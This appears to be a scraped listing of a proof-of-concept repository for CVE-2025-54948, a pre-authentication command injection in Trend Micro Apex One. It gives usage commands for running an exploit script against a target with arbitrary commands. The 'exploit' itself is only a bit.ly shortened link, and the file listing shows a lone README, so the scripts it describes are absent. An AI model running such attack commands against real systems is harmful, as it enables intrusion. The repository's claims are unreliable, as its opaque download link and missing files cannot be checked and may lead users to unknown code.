CVE-2025-54948 PoC — Trend Micro Apex One Security Vulnerability

Associated Vulnerability
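Title: Trend Micro Apex One Security Vulnerability (CVE-2025-54948)
Description: Trend Micro Apex One is an endpoint protection product from Trend Micro, a US company. Trend Micro Apex One contains a security vulnerability that stems from allowing a pre-authenticated remote attacker to upload malicious code and execute commands.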
Readme
# CVE-2025-54948 PoC Exploit - Trend Micro Apex One Management Console RCE

This repository provides a proof-of-concept (PoC) exploit for CVE-2025-54948, a remote code execution vulnerability in the Trend Micro Apex One Management Console (on-premise). The vulnerability allows pre-authenticated attackers to execute arbitrary commands due to insufficient input validation.

**WARNING**: This PoC is for educational and authorized testing purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical. The author is not responsible for any misuse.

## Vulnerability Details

- **CVE ID**: CVE-2025-54948
- **CVSSv3 Score**: 9.4 (Critical)
- **Affected Software**: Trend Micro Apex One (on-premise), Management Server ≤ 14039
- **Platform**: Windows
- **Description**: A command injection vulnerability in the management console allows pre-authenticated attackers to upload and execute malicious code.

## Exploit - [href](http://bit.ly/3HpN6dp)

## Usage

1. **Install Dependencies**:
   ```bash
   pip install -r requirements.txt
   ```

2. **Run the Exploit**:
   ```bash
   python exploit.py <target_url> [--command <command>]
   ```
   Example:
   ```bash
   python exploit.py "http://192.168.1.100:8080" --command "whoami"
   ```

3. **Verify Output**: Check the console logs for execution status and response details.

## Requirements

- Python 3.6+
- Libraries listed in `requirements.txt`

## Disclaimer

This PoC is provided "as is" for security researchers and system administrators to understand the vulnerability. Use it only with explicit permission from the system owner. Misuse may violate laws and cause harm.

## Mitigation

A full patch is expected by mid-August 2025. See [Trend Micro Security Bulletin](https://success.trendmicro.com/en-US/solution/KA-0019926).

## References

- [Trend Micro Security Bulletin](https://success.trendmicro.com/en-US/solution/KA-0019926)
- [Qualys ThreatPROTECT Blog](https://threatprotect.qualys.com/2025/08/06/trend-micro-apex-one-on-prem-zero-day-vulnerabilities-exploited-in-the-wild-cve-2025-54948-cve-2025-54987/)
File Snapshot

[4.0K] /data/pocs/6df3d7e0004136919c03ed1efd812906008de3ac
└── [2.1K] README.md

0 directories, 1 file